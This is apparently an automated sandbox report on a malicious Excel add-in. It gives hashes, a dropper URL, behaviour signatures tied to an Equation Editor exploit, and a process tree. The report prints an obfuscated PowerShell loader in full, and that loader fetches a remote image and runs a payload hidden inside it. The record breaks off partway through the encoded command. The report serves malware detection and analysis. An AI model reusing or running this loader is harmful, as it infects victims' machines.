Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20231020-en
  • resource tags

    arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
  • submitted
    21-10-2023 18:53

General

  • Target

    NEAS.NEASf4d8c1a30a7b5bcc8c486c0be1255b620da33af0bd491fe6bc28a1ae90300428xlsxxlsx_JC.xlam

  • Size

    725KB

  • MD5

    7c8f10ca8113bde86cc98e6e08c2318c

  • SHA1

    6d985706cb5c210d944e07b24dffd9ae5d57927f

  • SHA256

    f4d8c1a30a7b5bcc8c486c0be1255b620da33af0bd491fe6bc28a1ae90300428

  • SHA512

    165f8514f9157c261b9ca06415e5aa5dc93187fe043eff828ae5f8118c213922b548645fead417edb1aef253dfb7cdffc001af103235ec7735a8709fe47c1e2a

  • SSDEEP

    12288:fcs34BfUcKYHk2g6hdeLBC74aSzU8CBSlizbbS1IK64GkBh7HgfPp2j:f8KYLs5zTCQqbbSy4dDSPpk

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://wallpapercave.com/uwp/uwp4082989.png

exe.dropper

https://wallpapercave.com/uwp/uwp4082989.png

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\NEAS.NEASf4d8c1a30a7b5bcc8c486c0be1255b620da33af0bd491fe6bc28a1ae90300428xlsxxlsx_JC.xlam
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2064
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2716
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\wvsdfgjs.vbs"
      2⤵
      • Blocklisted process makes network request
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      PID:2592
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JrJWgRidYoNfCmÇjyDBprJWgRidYoNfCmÇjyDG0rJWgRidYoNfCmÇjyDYQBnrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDVQByrJWgRidYoNfCmÇjyDGwrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD9rJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJwBorJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDBwrJWgRidYoNfCmÇjyDHMrJWgRidYoNfCmÇjyDOgrJWgRidYoNfCmÇjyDvrJWgRidYoNfCmÇjyDC8rJWgRidYoNfCmÇjyDdwBhrJWgRidYoNfCmÇjyDGwrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDBwrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDHIrJWgRidYoNfCmÇjyDYwBhrJWgRidYoNfCmÇjyDHYrJWgRidYoNfCmÇjyDZQrJWgRidYoNfCmÇjyDurJWgRidYoNfCmÇjyDGMrJWgRidYoNfCmÇjyDbwBtrJWgRidYoNfCmÇjyDC8rJWgRidYoNfCmÇjyDdQB3rJWgRidYoNfCmÇjyDHrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDLwB1rJWgRidYoNfCmÇjyDHcrJWgRidYoNfCmÇjyDcrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD0rJWgRidYoNfCmÇjyDDrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDOrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDyrJWgRidYoNfCmÇjyDDkrJWgRidYoNfCmÇjyDOrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD5rJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDcrJWgRidYoNfCmÇjyDBurJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDJwrJWgRidYoNfCmÇjyD7rJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDdwBlrJWgRidYoNfCmÇjyDGIrJWgRidYoNfCmÇjyDQwBsrJWgRidYoNfCmÇjyDGkrJWgRidYoNfCmÇjyDZQBurJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD9rJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDTgBlrJWgRidYoNfCmÇjyDHcrJWgRidYoNfCmÇjyDLQBPrJWgRidYoNfCmÇjyDGIrJWgRidYoNfCmÇjyDagBlrJWgRidYoNfCmÇjyDGMrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDFMrJWgRidYoNfCmÇjyDeQBzrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDZQBtrJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDTgBlrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDLgBXrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDYgBDrJWgRidYoNfCmÇjyDGwrJWgRidYoNfCmÇjyDaQBlrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD7rJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDaQBtrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDZwBlrJWgRidYoNfCmÇjyDEIrJWgRidYoNfCmÇjyDeQB0rJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDcwrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDD0rJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDkrJWgRidYoNfCmÇjyDHcrJWgRidYoNfCmÇjyDZQBirJWgRidYoNfCmÇjyDEMrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDBprJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDbgB0rJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDRrJWgRidYoNfCmÇjyDBvrJWgRidYoNfCmÇjyDHcrJWgRidYoNfCmÇjyDbgBsrJWgRidYoNfCmÇjyDG8rJWgRidYoNfCmÇjyDYQBkrJWgRidYoNfCmÇjyDEQrJWgRidYoNfCmÇjyDYQB0rJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDKrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDkrJWgRidYoNfCmÇjyDGkrJWgRidYoNfCmÇjyDbQBhrJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDZQBVrJWgRidYoNfCmÇjyDHIrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDprJWgRidYoNfCmÇjyDDsrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBprJWgRidYoNfCmÇjyDG0rJWgRidYoNfCmÇjyDYQBnrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDVrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDHgrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDD0rJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDBbrJWgRidYoNfCmÇjyDFMrJWgRidYoNfCmÇjyDeQBzrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDZQBtrJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDVrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDHgrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDurJWgRidYoNfCmÇjyDEUrJWgRidYoNfCmÇjyDbgBjrJWgRidYoNfCmÇjyDG8rJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBprJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZwBdrJWgRidYoNfCmÇjyDDorJWgRidYoNfCmÇjyDOgBVrJWgRidYoNfCmÇjyDFQrJWgRidYoNfCmÇjyDRgrJWgRidYoNfCmÇjyD4rJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDRwBlrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDUwB0rJWgRidYoNfCmÇjyDHIrJWgRidYoNfCmÇjyDaQBurJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDKrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDkrJWgRidYoNfCmÇjyDGkrJWgRidYoNfCmÇjyDbQBhrJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDZQBCrJWgRidYoNfCmÇjyDHkrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDHMrJWgRidYoNfCmÇjyDKQrJWgRidYoNfCmÇjyD7rJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDcwB0rJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcgB0rJWgRidYoNfCmÇjyDEYrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDBhrJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD9rJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJwrJWgRidYoNfCmÇjyD8rJWgRidYoNfCmÇjyDDwrJWgRidYoNfCmÇjyDQgBBrJWgRidYoNfCmÇjyDFMrJWgRidYoNfCmÇjyDRQrJWgRidYoNfCmÇjyD2rJWgRidYoNfCmÇjyDDQrJWgRidYoNfCmÇjyDXwBTrJWgRidYoNfCmÇjyDFQrJWgRidYoNfCmÇjyDQQBSrJWgRidYoNfCmÇjyDFQrJWgRidYoNfCmÇjyDPgrJWgRidYoNfCmÇjyD+rJWgRidYoNfCmÇjyDCcrJWgRidYoNfCmÇjyDOwrJWgRidYoNfCmÇjyDkrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDEYrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDBhrJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD9rJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJwrJWgRidYoNfCmÇjyD8rJWgRidYoNfCmÇjyDDwrJWgRidYoNfCmÇjyDQgBBrJWgRidYoNfCmÇjyDFMrJWgRidYoNfCmÇjyDRQrJWgRidYoNfCmÇjyD2rJWgRidYoNfCmÇjyDDQrJWgRidYoNfCmÇjyDXwBFrJWgRidYoNfCmÇjyDE4rJWgRidYoNfCmÇjyDRrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD+rJWgRidYoNfCmÇjyDD4rJWgRidYoNfCmÇjyDJwrJWgRidYoNfCmÇjyD7rJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDcwB0rJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcgB0rJWgRidYoNfCmÇjyDEkrJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDerJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDD0rJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDkrJWgRidYoNfCmÇjyDGkrJWgRidYoNfCmÇjyDbQBhrJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDZQBUrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDerJWgRidYoNfCmÇjyDB0rJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDSQBurJWgRidYoNfCmÇjyDGQrJWgRidYoNfCmÇjyDZQB4rJWgRidYoNfCmÇjyDE8rJWgRidYoNfCmÇjyDZgrJWgRidYoNfCmÇjyDorJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDcwB0rJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcgB0rJWgRidYoNfCmÇjyDEYrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDBhrJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDKQrJWgRidYoNfCmÇjyD7rJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDZQBurJWgRidYoNfCmÇjyDGQrJWgRidYoNfCmÇjyDSQBurJWgRidYoNfCmÇjyDGQrJWgRidYoNfCmÇjyDZQB4rJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDPQrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDaQBtrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDZwBlrJWgRidYoNfCmÇjyDFQrJWgRidYoNfCmÇjyDZQB4rJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDLgBJrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDHgrJWgRidYoNfCmÇjyDTwBmrJWgRidYoNfCmÇjyDCgrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBGrJWgRidYoNfCmÇjyDGwrJWgRidYoNfCmÇjyDYQBnrJWgRidYoNfCmÇjyDCkrJWgRidYoNfCmÇjyDOwrJWgRidYoNfCmÇjyDkrJWgRidYoNfCmÇjyDHMrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDBhrJWgRidYoNfCmÇjyDHIrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDBJrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDHgrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDtrJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDZQrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDDrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDtrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBJrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDHgrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDtrJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDcwB0rJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcgB0rJWgRidYoNfCmÇjyDEkrJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDerJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD7rJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDcwB0rJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcgB0rJWgRidYoNfCmÇjyDEkrJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDerJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCsrJWgRidYoNfCmÇjyDPQrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDcwB0rJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcgB0rJWgRidYoNfCmÇjyDEYrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDBhrJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDLgBMrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDbgBnrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDarJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD7rJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDYgBhrJWgRidYoNfCmÇjyDHMrJWgRidYoNfCmÇjyDZQrJWgRidYoNfCmÇjyD2rJWgRidYoNfCmÇjyDDQrJWgRidYoNfCmÇjyDTrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZwB0rJWgRidYoNfCmÇjyDGgrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD9rJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBJrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDHgrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDtrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBzrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDYQByrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDSQBurJWgRidYoNfCmÇjyDGQrJWgRidYoNfCmÇjyDZQB4rJWgRidYoNfCmÇjyDDsrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBirJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcwBlrJWgRidYoNfCmÇjyDDYrJWgRidYoNfCmÇjyDNrJWgRidYoNfCmÇjyDBDrJWgRidYoNfCmÇjyDG8rJWgRidYoNfCmÇjyDbQBtrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDPQrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDaQBtrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDZwBlrJWgRidYoNfCmÇjyDFQrJWgRidYoNfCmÇjyDZQB4rJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDLgBTrJWgRidYoNfCmÇjyDHUrJWgRidYoNfCmÇjyDYgBzrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDcgBprJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZwrJWgRidYoNfCmÇjyDorJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDcwB0rJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcgB0rJWgRidYoNfCmÇjyDEkrJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDerJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDsrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBirJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcwBlrJWgRidYoNfCmÇjyDDYrJWgRidYoNfCmÇjyDNrJWgRidYoNfCmÇjyDBMrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDbgBnrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDarJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDprJWgRidYoNfCmÇjyDDsrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBjrJWgRidYoNfCmÇjyDG8rJWgRidYoNfCmÇjyDbQBtrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDEIrJWgRidYoNfCmÇjyDeQB0rJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDcwrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDD0rJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDBbrJWgRidYoNfCmÇjyDFMrJWgRidYoNfCmÇjyDeQBzrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDZQBtrJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDQwBvrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDdgBlrJWgRidYoNfCmÇjyDHIrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDBdrJWgRidYoNfCmÇjyDDorJWgRidYoNfCmÇjyDOgBGrJWgRidYoNfCmÇjyDHIrJWgRidYoNfCmÇjyDbwBtrJWgRidYoNfCmÇjyDEIrJWgRidYoNfCmÇjyDYQBzrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDNgrJWgRidYoNfCmÇjyD0rJWgRidYoNfCmÇjyDFMrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDByrJWgRidYoNfCmÇjyDGkrJWgRidYoNfCmÇjyDbgBnrJWgRidYoNfCmÇjyDCgrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBirJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcwBlrJWgRidYoNfCmÇjyDDYrJWgRidYoNfCmÇjyDNrJWgRidYoNfCmÇjyDBDrJWgRidYoNfCmÇjyDG8rJWgRidYoNfCmÇjyDbQBtrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDCkrJWgRidYoNfCmÇjyDOwrJWgRidYoNfCmÇjyDkrJWgRidYoNfCmÇjyDGwrJWgRidYoNfCmÇjyDbwBhrJWgRidYoNfCmÇjyDGQrJWgRidYoNfCmÇjyDZQBkrJWgRidYoNfCmÇjyDEErJWgRidYoNfCmÇjyDcwBzrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDbQBirJWgRidYoNfCmÇjyDGwrJWgRidYoNfCmÇjyDeQrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDD0rJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDBbrJWgRidYoNfCmÇjyDFMrJWgRidYoNfCmÇjyDeQBzrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDZQBtrJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDUgBlrJWgRidYoNfCmÇjyDGYrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDGMrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDBprJWgRidYoNfCmÇjyDG8rJWgRidYoNfCmÇjyDbgrJWgRidYoNfCmÇjyDurJWgRidYoNfCmÇjyDEErJWgRidYoNfCmÇjyDcwBzrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDbQBirJWgRidYoNfCmÇjyDGwrJWgRidYoNfCmÇjyDeQBdrJWgRidYoNfCmÇjyDDorJWgRidYoNfCmÇjyDOgBMrJWgRidYoNfCmÇjyDG8rJWgRidYoNfCmÇjyDYQBkrJWgRidYoNfCmÇjyDCgrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBjrJWgRidYoNfCmÇjyDG8rJWgRidYoNfCmÇjyDbQBtrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDbgBkrJWgRidYoNfCmÇjyDEIrJWgRidYoNfCmÇjyDeQB0rJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDcwrJWgRidYoNfCmÇjyDprJWgRidYoNfCmÇjyDDsrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDB0rJWgRidYoNfCmÇjyDHkrJWgRidYoNfCmÇjyDcrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDPQrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDBvrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDGQrJWgRidYoNfCmÇjyDQQBzrJWgRidYoNfCmÇjyDHMrJWgRidYoNfCmÇjyDZQBtrJWgRidYoNfCmÇjyDGIrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDB5rJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDRwBlrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDVrJWgRidYoNfCmÇjyDB5rJWgRidYoNfCmÇjyDHrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDZQrJWgRidYoNfCmÇjyDorJWgRidYoNfCmÇjyDCcrJWgRidYoNfCmÇjyDRgBprJWgRidYoNfCmÇjyDGIrJWgRidYoNfCmÇjyDZQByrJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDSrJWgRidYoNfCmÇjyDBvrJWgRidYoNfCmÇjyDG0rJWgRidYoNfCmÇjyDZQrJWgRidYoNfCmÇjyDnrJWgRidYoNfCmÇjyDCkrJWgRidYoNfCmÇjyDOwrJWgRidYoNfCmÇjyDkrJWgRidYoNfCmÇjyDG0rJWgRidYoNfCmÇjyDZQB0rJWgRidYoNfCmÇjyDGgrJWgRidYoNfCmÇjyDbwBkrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDPQrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDB5rJWgRidYoNfCmÇjyDHrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDZQrJWgRidYoNfCmÇjyDurJWgRidYoNfCmÇjyDEcrJWgRidYoNfCmÇjyDZQB0rJWgRidYoNfCmÇjyDE0rJWgRidYoNfCmÇjyDZQB0rJWgRidYoNfCmÇjyDGgrJWgRidYoNfCmÇjyDbwBkrJWgRidYoNfCmÇjyDCgrJWgRidYoNfCmÇjyDJwBWrJWgRidYoNfCmÇjyDEErJWgRidYoNfCmÇjyDSQrJWgRidYoNfCmÇjyDnrJWgRidYoNfCmÇjyDCkrJWgRidYoNfCmÇjyDLgBJrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDdgBvrJWgRidYoNfCmÇjyDGsrJWgRidYoNfCmÇjyDZQrJWgRidYoNfCmÇjyDorJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDbgB1rJWgRidYoNfCmÇjyDGwrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDsrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDWwBvrJWgRidYoNfCmÇjyDGIrJWgRidYoNfCmÇjyDagBlrJWgRidYoNfCmÇjyDGMrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDBbrJWgRidYoNfCmÇjyDF0rJWgRidYoNfCmÇjyDXQrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCgrJWgRidYoNfCmÇjyDJwBkrJWgRidYoNfCmÇjyDEgrJWgRidYoNfCmÇjyDarJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDwrJWgRidYoNfCmÇjyDEwrJWgRidYoNfCmÇjyDbgBsrJWgRidYoNfCmÇjyDGkrJWgRidYoNfCmÇjyDWQBTrJWgRidYoN